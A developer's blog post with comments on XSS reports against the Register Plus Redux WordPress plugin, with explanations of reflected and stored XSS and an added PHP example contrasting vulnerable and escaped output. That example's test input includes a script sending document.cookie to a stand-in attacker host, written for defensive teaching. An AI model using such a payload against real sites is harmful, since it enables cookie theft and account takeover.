Register Plus Redux was removed after the following vulnerabilities disclosed to packetstormsecurity.org were forwarded to plugins@wordpress.org.
http://websecurity.com.ua/4542/ dated 9/18/2010
http://websecurity.com.ua/5089/ dated 4/18/2011
At the time, I didn’t think much of these vulnerabilities. To be honest, I still don’t. I couldn’t figure out how to replicate them. To be honest, I still can’t. Maybe that makes me a buffoon, I don’t know. The fact that they are in Ukrainian certainly didn’t help. On top of that, I just don’t get it.
My knowledge of XSS is limited to the following. When you take information from HTTP GET or POST, you need to validate it because anyone can spoof that data. OK, cool. I try to keep that in mind, I think I do OK in that regard, although I did find a couple of oversights following this whole debacle.
My problem, I think, might be philosophical. Honestly, being that I am a self-taught programmer, words escape me trying to explain my “philosophy”, for lack of a better word. On the Settings page, I allow HTML to be entered in custom messages. Such as when someone goes to the Registration page and you want it to say, “You will need a confirmation number to register, <click here> for more information.” In the code I received from MustLive that is prohibited. And here is where his report and my knowledge diverge.
Is there a potential for the HTTP POST information to be modified, thus setting that message to something malicious that… I don’t know, yanks cookies and sends them to some far off bad guy, for example. Sure. But, I use a nonce and check_admin_referer as recommended by WordPress, and, as far as I know, as used by WordPress core. Whenever possible, I have referred to WordPress core files and used the same syntax and functions used on core pages. So, how is Redux any more vulnerable? I just don’t understand and I scratched my head for a while, and then gave up.
But from time to time, I think, maybe I just didn’t look at it hard enough, maybe I’ll see something new. Still nothing. So last week, I turned to the internet.
This is a more specific problem that MustLive pointed out. However, I figured it was one of the easier ones to recreate without getting into WordPress as a whole.
Surprisingly, to me, no true replies. Not to attack the only person who responded at all, Jonathan Rowny, but his response to me, just sounds more of paranoia. This “problem” was big enough to get Redux yanked, but yet the only solution is to prohibit any HTML and reduce functionality, for what?
Anyway, I don’t want to dismiss MustLive, Jonathan Rowny, or anyone else that ever asked me about this or sent me a message. Nevertheless, I still don’t know what to do to make them happy, and you, constant user, secure. I would run this plugin on my page. I do. Not for any reason, there’s no point in registering here, just so I can test it myself.
Long story short, I just don’t know what to do, and we are still where we were a year ago.

Hi radiok,
Have you tried to contact plugins@worpress.com?
Or maybe Otto?
Cheers,
Gabriel
I haven’t, but I’ve been hoping to have more resolution before I do. Maybe I should just bite the bullet, but I have a deafening fear of sounding stupid!
Hi,
The correct email is plugins@wordpress.org
Otto is very clever and surely would be able to provide a clear explanation of the issue.
Regards,
Gabriel
A “Reflected” XSS hole is the most commonplace one. This sort of attack happens when you take input from the user, and spit it back out into the resulting page without sanitizing it first. In other words, if I can put in HTML, and have that HTML sent back to me in the HTML page, then you have a reflected XSS hole.
A “persistent” XSS hole is much the same, but it’s where the data is stored in the database instead. An example of this would be somebody leaving a comment, and putting a script tag in there.
The reason this is bad is because now I have the ability to trick somebody else into running arbitrary HTML within the context of your website. In other words, I can build a special link to your site, trick you into clicking on it somehow, and then have it run my javascript on your site. I can use this to have it send me your cookies, and thus I can become you. Or I can use it to have you perform actions on your site, and automatically add spam to your posts. Or whatever I want, because once I have my script running in the context of your website and *in your browser* then I essentially am “you” and can do anything you can do.
The solution: Never, ever, trust user input. Sanitize it. If you want them to be able to input HTML, then that’s fine. But you don’t instantly spit that HTML back out to them without sanitizing it. If it’s supposed to be in a textarea for them to edit, then you must use esc_textarea on it before outputting it. If it’s supposed to be displayed on the page, then you use esc_html on it. If you don’t really need them to be able to use “arbitrary” HTML, then you can run it through kses to limit the sort of HTML they can use, in the same way that this comments box only allows a small number of tags to be used. At an absolute minimum, you never allow them to input scripts.
I feel a bit like a celebrity just posted on my site! Anyway, I have a question for you, since you are here and all. Should I be sanitizing before the database commit, when displaying, or both? I feel like it’s a bit wasteful to sanitize in and out. I was thinking on display only since it’s possible the database was compromised some other way. But at the same time, I don’t want to be the one compromising it, so maybe I should do both! Argh! I complicate my own questions. Anyway, your thoughts?
Hi radiok,
That one is easy, sanitize both.
http://codex.wordpress.org/Data_Validation
Regards,
Gabriel
Actually, it looks like the golden rule is, “sanitize on input, escape on output” so that’s what I am reviewing now.
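The pattern Otto describes above, together with the “sanitize on input, escape on output” rule radiok lands on, as an added example (editor’s code, not Register Plus Redux’s and not WordPress core’s): a custom message that may carry limited HTML is run through kses when it is saved, escaped with esc_textarea when it is put back into the settings form for editing, and run through kses again when it is displayed on the registration page. The rpr_* names, the allowed-tag list and the hostile input are assumptions. The three function_exists() stand-ins exist only so the file runs with plain php outside WordPress (inside WordPress the real esc_textarea, esc_html and wp_kses are used); the wp_kses stand-in is deliberately crude, dropping every attribute, and is not a sanitizer to copy. One point worth making explicit: check_admin_referer() verifies a nonce, which defends against CSRF by proving the request came from this site’s admin form; it never looks at the submitted value, so a nonce alone leaves a stored-HTML field exactly as exposed as Otto’s persistent case.

```php
<?php
// Added example, not code from Register Plus Redux or WordPress core.
// rpr_* names, the whitelist and the sample input are assumptions.
//
// Stand-ins so the file runs outside WordPress; inside WordPress the real
// functions are defined and these blocks are skipped. The wp_kses stand-in
// drops every attribute and is only here to make the flow runnable; the real
// wp_kses keeps the attributes listed in the second argument.
if (!function_exists('esc_textarea')) {
    function esc_textarea($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); }
}
if (!function_exists('wp_kses')) {
    function wp_kses($text, $allowed_html) {
        $tags = '<' . implode('><', array_keys($allowed_html)) . '>';
        return preg_replace('/<(\w+)[^>]*>/', '<$1>', strip_tags($text, $tags));
    }
}

// The HTML a custom message is allowed to carry (a link, emphasis, a break).
// Assumed whitelist; a plugin would tune this to what the message needs.
function rpr_allowed_message_html() {
    return array(
        'a'      => array('href' => true, 'title' => true),
        'strong' => array(),
        'em'     => array(),
        'br'     => array(),
    );
}

// Sanitize on input: called from the settings save handler after
// check_admin_referer() has verified the nonce. The nonce proves the request
// came from this site's admin form (CSRF defense); it does not inspect the
// value, so kses still has to run before the value is stored.
function rpr_sanitize_message($raw) {
    return wp_kses((string) $raw, rpr_allowed_message_html());
}

// Escape on output, context 1: the settings form. The stored value goes back
// into a <textarea> for editing and must be escaped for that context.
function rpr_settings_field_vulnerable($stored) {
    return '<textarea name="rpr_message">' . $stored . '</textarea>';
}
function rpr_settings_field_fixed($stored) {
    return '<textarea name="rpr_message">' . esc_textarea($stored) . '</textarea>';
}

// Escape on output, context 2: the registration page, where the message is
// rendered as HTML. kses runs again at display time because the row may have
// been written by an older plugin version, another plugin, or direct SQL.
function rpr_registration_notice($stored) {
    return '<p class="rpr-notice">' . wp_kses($stored, rpr_allowed_message_html()) . '</p>';
}

// Constructed input: what a hostile form submission (or a poisoned row in
// wp_options) might contain. It tries to close the textarea early and to hang
// an event handler on the permitted <a> tag.
$hostile = 'Need a confirmation number? <a href="/help" onclick="alert(1)">click here</a>'
         . '</textarea><script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo "-- vulnerable settings field: textarea closed early, script lands in the page --\n";
echo rpr_settings_field_vulnerable($hostile), "\n\n";

echo "-- fixed settings field: esc_textarea keeps the whole value inside the textarea --\n";
echo rpr_settings_field_fixed($hostile), "\n\n";

echo "-- value as stored after rpr_sanitize_message(): tags outside the whitelist gone --\n";
$stored = rpr_sanitize_message($hostile);
echo $stored, "\n\n";

echo "-- registration page notice as a visitor would receive it --\n";
echo rpr_registration_notice($stored), "\n";
```

Run it with php on the command line: the first block of output shows the textarea closed and the script sitting in the page, the second shows the same value rendered inert, and the last two show what is stored and what reaches a visitor. Note that kses, real or stand-in, removes the script tags but leaves their text content behind as plain text, which is harmless in a paragraph; the stand-in also strips the href that real wp_kses would keep.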
Any progress on this? I would love to see this plugin return!
My work has gotten away from me again a bit. I’ll try and get the in-progress version up sooner than later.
Just wanted to follow up and see where this is at… I love this plugin and would love to see it return.
I love this plugin, currently using it from the WordPress plugin site, is it secure now? Also, if you could add controls for background color and text, this would be perfect. Thank you
art, thank you! Redux has been secured and I have received no notification of anything to the contrary. I resolved all known security risks and a few unknown ones at the same time. Redux offers an option for custom CSS, you can use that to change the background color to anything you can imagine! If you need help experimenting post more specifics and I will assist when I have a chance.